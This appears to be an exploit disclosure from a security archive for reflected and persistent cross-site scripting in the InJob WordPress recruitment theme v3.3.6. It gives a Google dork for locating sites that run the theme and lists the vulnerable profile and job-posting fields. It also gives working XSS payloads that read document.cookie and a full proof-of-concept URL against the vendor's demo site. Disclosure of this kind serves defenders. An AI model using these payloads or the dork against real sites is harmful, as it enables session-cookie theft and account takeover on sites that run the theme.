InJob | Multi-purpose for recruitment WordPress Theme v3.3.6 Reflected & Persistent XSS

2019.09.16
ru SubversA (RU) ru
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: InJob | Multi-purpose for recruitment WordPress Theme v3.3.6 Reflected & Persistent XSS # Google Dork: inurl:/wp-content/themes/injob/ # Date: 15/09/2019 # Exploit Author: SubversA # Vendor Homepage: http://www.inwavethemes.com/ # Software Link: https://themeforest.net/item/injob-job-board-wordpress-theme/20322987 # Version: 3.3.6 # Tested on: Parrot OS # CVE : - # CWE : 79 ----[]- Reflected XSS: -[]---- Use your payload inside the «Enter Keywords» input field and then submit the form — payload will be triggered twice. Payload Sample: <!--<img src="--><img src=x onerror=(alert)(document.cookie)//"> PoC Link: http://jobboard.inwavethemes.com/jobs/?keyword=%3C%21--%3Cimg+src%3D%22--%3E%3Cimg+src%3Dx+onerror%3D%28alert%29%28document.cookie%29%2F%2F%22%3E&iwj_location=&iwj_cat=&iwj_type=&iwj_skill=&iwj_level=&iwj_salary= ----[]- Persistent XSS #1: -[]---- You need a new basic user account, then go to the dashboard and edit your profile. Vulnerable input fields: - «Phone» & «Headline *»; - «Title» input field in the «Skills» section; - «Title», «Description», «Date In - Date Out» & «Company Name» in the «Experiences» section; - «Title», «Description» & «School Name» in the «Educations» section; - «Address *» input field in the «Location & Map» section. Use your payload inside any vulnerable input field and save your profile. Payload Sample: <!--<img src="--><img src=x onerror=(alert)(document.cookie)//"> PoC: log in as candidate:demo (login/password) and go to the dashboard or as guest go to the http://jobboard.inwavethemes.com/employers?alpha=i page. ----[]- Persistent XSS #2: -[]---- You need an employer user account, then go to the http://jobboard.inwavethemes.com/dashboard/?iwj_tab=new-job page to create a new job offer. Vulnerable input fields: «Salary Postfix Text» and «Address *». Payload Sample: <img src=x onerror=(alert)(document.domain)//">


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top